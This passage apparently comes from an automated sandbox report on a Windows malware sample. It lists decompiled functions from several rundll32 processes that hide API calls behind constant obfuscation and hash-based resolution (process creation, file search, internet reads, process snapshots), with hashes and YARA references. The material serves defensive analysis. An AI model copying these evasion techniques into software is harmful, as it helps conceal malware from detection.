				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E00EE2309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x00ee424e
0x00ee4254
0x00ee425b
0x00ee4262
0x00ee4269
0x00ee4272
0x00ee4277
0x00ee427c
0x00ee4283
0x00ee428a
0x00ee4291
0x00ee4298
0x00ee42a2
0x00ee42aa
0x00ee42ad
0x00ee42b1
0x00ee42b5
0x00ee42bc
0x00ee42c3
0x00ee42c7
0x00ee42e7
0x00ee42f1

APIs

ExitProcess.KERNEL32(00000000), ref: 00EE42F1

Memory Dump Source

Source File: 00000003.00000002.726592167.0000000000EE0000.00000040.00000001.sdmp, Offset: 00EE0000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: ee1f0fa7f9e622b2fa6a57f64d73d77e27c21709e7dbeeac09642e7b327f5078
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: F81128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EF17CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00EF17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00F02523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E00EE2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x00ef17d2
0x00ef17d5
0x00ef17d7
0x00ef17db
0x00ef17dc
0x00ef17e1
0x00ef17e8
0x00ef17f1
0x00ef17f8
0x00ef17ff
0x00ef1803
0x00ef1807
0x00ef180e
0x00ef181b
0x00ef1822
0x00ef1825
0x00ef182c
0x00ef1833
0x00ef1844
0x00ef1847
0x00ef1859
0x00ef185c
0x00ef1863
0x00ef186a
0x00ef186e
0x00ef1881
0x00ef188d
0x00ef1893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 00EF188D

Memory Dump Source

Source File: 00000003.00000002.726592167.0000000000EE0000.00000040.00000001.sdmp, Offset: 00EE0000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 584faad76bf719f0c8dcf6a688b53e486fa39efb382973298e686009412e5c70
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 842113B5D0020DFBDB08DFA4C94A9EEBBB5EB44304F208189E425B7240E3B56B049FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6544 Parent PID: 6480 rundll32.exeCOMMON

Executed Functions

Function 009331D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E009331D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00932523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E00912309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x009331da
0x009331df
0x009331e1
0x009331e4
0x009331e7
0x009331e8
0x009331e9
0x009331ec
0x009331ef
0x009331f2
0x009331f3
0x009331f4
0x009331f7
0x009331fa
0x009331fd
0x009331fe
0x00933200
0x00933205
0x0093320f
0x00933214
0x0093321b
0x0093321f
0x00933223
0x0093322a
0x00933231
0x00933235
0x00933241
0x00933249
0x0093324c
0x00933253
0x0093325a
0x0093325e
0x00933265
0x0093326c
0x00933273
0x0093327a
0x00933281
0x009332a1
0x009332bb
0x009332c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 009332BB

Memory Dump Source

Source File: 00000006.00000002.756242362.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: c1115648f61d4eaa0cf94c94bd16ff11c11c2be98f318a83e0e5ba6d777ea57a
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 86310372901248BBCF65DF96CD09CDFBFB5FB99704F108188F914A2220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00914248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00914248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E00912309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x0091424e
0x00914254
0x0091425b
0x00914262
0x00914269
0x00914272
0x00914277
0x0091427c
0x00914283
0x0091428a
0x00914291
0x00914298
0x009142a2
0x009142aa
0x009142ad
0x009142b1
0x009142b5
0x009142bc
0x009142c3
0x009142c7
0x009142e7
0x009142f1

APIs

ExitProcess.KERNEL32(00000000), ref: 009142F1

Memory Dump Source

Source File: 00000006.00000002.756242362.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: e9bb7c5a0bd612ea021a6a8bdf0155a96921962e24748c1230a0553e58d6664a
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 011128B5E00208EBDB44DFE5D94AADEBBF1FB44708F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009217CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E009217CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00932523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E00912309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x009217d2
0x009217d5
0x009217d7
0x009217db
0x009217dc
0x009217e1
0x009217e8
0x009217f1
0x009217f8
0x009217ff
0x00921803
0x00921807
0x0092180e
0x0092181b
0x00921822
0x00921825
0x0092182c
0x00921833
0x00921844
0x00921847
0x00921859
0x0092185c
0x00921863
0x0092186a
0x0092186e
0x00921881
0x0092188d
0x00921893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 0092188D

Memory Dump Source

Source File: 00000006.00000002.756242362.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: d4a828e81c40755b9203082b247a786b0f008f183617b12f49a2642077382d93
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 592127B5D0020CFFDB04DFA4C94A9EEBBB4EB44304F108189E425B7240E3B56B149F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 1320 Parent PID: 6508 rundll32.exeCOMMON

Executed Functions

Function 00FA31D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00FA31D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00FA2523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E00F82309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x00fa31da
0x00fa31df
0x00fa31e1
0x00fa31e4
0x00fa31e7
0x00fa31e8
0x00fa31e9
0x00fa31ec
0x00fa31ef
0x00fa31f2
0x00fa31f3
0x00fa31f4
0x00fa31f7
0x00fa31fa
0x00fa31fd
0x00fa31fe
0x00fa3200
0x00fa3205
0x00fa320f
0x00fa3214
0x00fa321b
0x00fa321f
0x00fa3223
0x00fa322a
0x00fa3231
0x00fa3235
0x00fa3241
0x00fa3249
0x00fa324c
0x00fa3253
0x00fa325a
0x00fa325e
0x00fa3265
0x00fa326c
0x00fa3273
0x00fa327a
0x00fa3281
0x00fa32a1
0x00fa32bb
0x00fa32c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 00FA32BB

Memory Dump Source

Source File: 00000009.00000002.777389984.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: e140be5fa302d0085a8b421bb637eb2f69a8741bee53e41b7d9b3450d41038f9
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 83311672901248BBCF65DF96CD09CDFBFB5FB89704F108188F91462220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F84248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F84248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E00F82309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x00f8424e
0x00f84254
0x00f8425b
0x00f84262
0x00f84269
0x00f84272
0x00f84277
0x00f8427c
0x00f84283
0x00f8428a
0x00f84291
0x00f84298
0x00f842a2
0x00f842aa
0x00f842ad
0x00f842b1
0x00f842b5
0x00f842bc
0x00f842c3
0x00f842c7
0x00f842e7
0x00f842f1

APIs

ExitProcess.KERNEL32(00000000), ref: 00F842F1

Memory Dump Source

Source File: 00000009.00000002.777389984.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: b97d74116a1ee2c798bd438b297f2b3c1ea82142ff7187550d4ade7370e78b69
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 2E1128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F917CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00F917CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00FA2523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E00F82309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x00f917d2
0x00f917d5
0x00f917d7
0x00f917db
0x00f917dc
0x00f917e1
0x00f917e8
0x00f917f1
0x00f917f8
0x00f917ff
0x00f91803
0x00f91807
0x00f9180e
0x00f9181b
0x00f91822
0x00f91825
0x00f9182c
0x00f91833
0x00f91844
0x00f91847
0x00f91859
0x00f9185c
0x00f91863
0x00f9186a
0x00f9186e
0x00f91881
0x00f9188d
0x00f91893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 00F9188D

Memory Dump Source

Source File: 00000009.00000002.777389984.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: 5cff913eb7536af7293b054c12ff6d8e26a332491138949af2527c82e51eebe5
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 212115B5D0020CFFDB04DFA4C94A9EEBBB4EB44304F108189E425A7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 4928 Parent PID: 1320 rundll32.exeCOMMON

Executed Functions

Function 031E1A80, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E031E1A80(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t44;
				void* _t55;
				signed int _t57;
				struct _WIN32_FIND_DATAW* _t63;

				_push(_a16);
				_t63 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E031F2523(_t44);
				_v36 = 0x40784c;
				asm("stosd");
				asm("stosd");
				_t57 = 0x66;
				asm("stosd");
				_v8 = 0xc58147;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xffff0e61;
				_v8 = _v8 ^ 0xffff2899;
				_v16 = 0x3eee0f;
				_v16 = _v16 ^ 0xf4098113;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x918df00d;
				_v12 = 0x61adbd;
				_v12 = _v12 | 0x1ce5c3f2;
				_v12 = _v12 ^ 0x5ce6c57a;
				_v12 = _v12 ^ 0x400dc737;
				_v20 = 0x919b51;
				_v20 = _v20 + 0x9c69;
				_v20 = _v20 ^ 0x00927a19;
				E031D2309(0x352, _t57, _t57, 0x810611c3, _t57, 0x9c9047d0);
				_t55 = FindFirstFileW(_a16, _t63); // executed
				return _t55;
			}

0x031e1a88
0x031e1a8b
0x031e1a8d
0x031e1a90
0x031e1a93
0x031e1a96
0x031e1a98
0x031e1a9d
0x031e1aac
0x031e1ab1
0x031e1ab2
0x031e1ab9
0x031e1aba
0x031e1acb
0x031e1ace
0x031e1ad2
0x031e1ad9
0x031e1ae0
0x031e1ae7
0x031e1af9
0x031e1afc
0x031e1b03
0x031e1b0a
0x031e1b11
0x031e1b18
0x031e1b1f
0x031e1b26
0x031e1b2d
0x031e1b40
0x031e1b4c
0x031e1b53

APIs

FindFirstFileW.KERNEL32(031DCC4B,?,?,?,?,?,?,?,?,?,?,09AB8BF6,00000072), ref: 031E1B4C

Strings

Lx@, xrefs: 031E1A9D

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: FileFindFirst
String ID: Lx@
API String ID: 1974802433-402333656
Opcode ID: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction ID: 5540043c805bba3eaa155b214a96baf74a7a7cd092635dbacf12c55a87b2795c
Opcode Fuzzy Hash: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction Fuzzy Hash: 0F215775D00218FBDB18CFA5DC4A8DEBFB4FB44300F008588E411A6260D3B59B55DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031F1027, Relevance: 1.6, APIs: 1, Instructions: 57
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E031F1027(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20, DWORD* _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				int _t55;
				signed int _t57;
				void* _t62;

				_push(_a24);
				_t62 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E031F2523(_t46);
				_v12 = 0xd4e775;
				_v12 = _v12 ^ 0x9fa1d679;
				_v12 = _v12 + 0xffffd43b;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x000b9d33;
				_v20 = 0xb1fd06;
				_v20 = _v20 + 0xffff1766;
				_v20 = _v20 ^ 0x00bd550d;
				_v16 = 0x2d7499;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x749af706;
				_v8 = 0x5dfa4b;
				_t57 = 0x11;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 | 0xef9b7d02;
				_v8 = _v8 ^ 0xef9457ed;
				E031D2309(0x254, _t57, _t57, 0xf677e454, _t57, 0xc0cf1a4);
				_t55 = InternetReadFile(_t62, _a8, _a12, _a24); // executed
				return _t55;
			}

0x031f102e
0x031f1031
0x031f1033
0x031f1036
0x031f1039
0x031f103c
0x031f103f
0x031f1043
0x031f1044
0x031f1049
0x031f1053
0x031f105c
0x031f1063
0x031f1067
0x031f106e
0x031f1075
0x031f107c
0x031f1083
0x031f108a
0x031f108e
0x031f1095
0x031f10a1
0x031f10a9
0x031f10ac
0x031f10b0
0x031f10b7
0x031f10d7
0x031f10e9
0x031f10ef

APIs

InternetReadFile.WININET(?,749AF706,00BD550D,?), ref: 031F10E9

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction ID: 6b8ffa36a315c2fffea0627ed2dcd48febad9250e9eab510c9733b151251b47b
Opcode Fuzzy Hash: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction Fuzzy Hash: 1B211576D00209BBDF05DFE4C94A8EEBBB1EF44300F108189F92566251E3B55B61EB91

Uniqueness

Uniqueness Score: -1.00%

Function 031E1B54, Relevance: 1.5, APIs: 1, Instructions: 47
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E031E1B54(int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t51;
				signed int _t52;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x604094;
				_v32 = 0x94e455;
				_v28 = 0xad6ab3;
				_v8 = 0x1f2344;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 0xe;
				_t52 = 0x3c;
				_v8 = _v8 * 0x16;
				_v8 = _v8 ^ 0x0ab2d5aa;
				_v20 = 0xb8d8f1;
				_v20 = _v20 ^ 0x9bb5e2ea;
				_v20 = _v20 ^ 0x9b0a37ea;
				_v16 = 0x527695;
				_v16 = _v16 << 1;
				_v16 = _v16 / _t52;
				_v16 = _v16 ^ 0x000d80fe;
				_v12 = 0xedaf67;
				_v12 = _v12 ^ 0xb485e6d8;
				_v12 = _v12 + 0xffff9be0;
				_v12 = _v12 ^ 0xb46ea43d;
				E031D2309(0x190, _t52, _t52, 0xbde7009f, _t52, 0x9c9047d0);
				_t51 = CreateToolhelp32Snapshot(_a4, 0); // executed
				return _t51;
			}

0x031e1b5a
0x031e1b60
0x031e1b67
0x031e1b6e
0x031e1b75
0x031e1b7c
0x031e1b80
0x031e1b8a
0x031e1b91
0x031e1b94
0x031e1b9b
0x031e1ba2
0x031e1ba9
0x031e1bb0
0x031e1bb7
0x031e1bc4
0x031e1bc7
0x031e1bce
0x031e1bd5
0x031e1bdc
0x031e1be3
0x031e1bfd
0x031e1c0a
0x031e1c0f

APIs

CreateToolhelp32Snapshot.KERNEL32(B46EA43D,00000000), ref: 031E1C0A

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction ID: 593d186709e22e04b8c302bfb251728f6eea5fbfd613ad521cce78e681610627
Opcode Fuzzy Hash: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction Fuzzy Hash: E111F3B1D0520CEBDB18DFA8C94A5AEBBB0FF48304F108199E521B72A0D7B55B04DF50

Uniqueness

Uniqueness Score: -1.00%

Function 031D54DA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E031D54DA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				int _t63;
				signed int _t65;
				signed int _t66;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E031F2523(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x6eade3;
				_v20 = 0x70ee4c;
				_v20 = _v20 + 0xffffd19f;
				_v20 = _v20 ^ 0x007528c6;
				_v16 = 0x80bb49;
				_v16 = _v16 + 0xffff2cb2;
				_v16 = _v16 >> 4;
				_t65 = 0x3d;
				_v16 = _v16 / _t65;
				_v16 = _v16 ^ 0x000cd3d3;
				_v12 = 0x49bca9;
				_v12 = _v12 + 0x284b;
				_v12 = _v12 + 0x352d;
				_v12 = _v12 ^ 0x5aa1db04;
				_v12 = _v12 ^ 0x5aee1bd2;
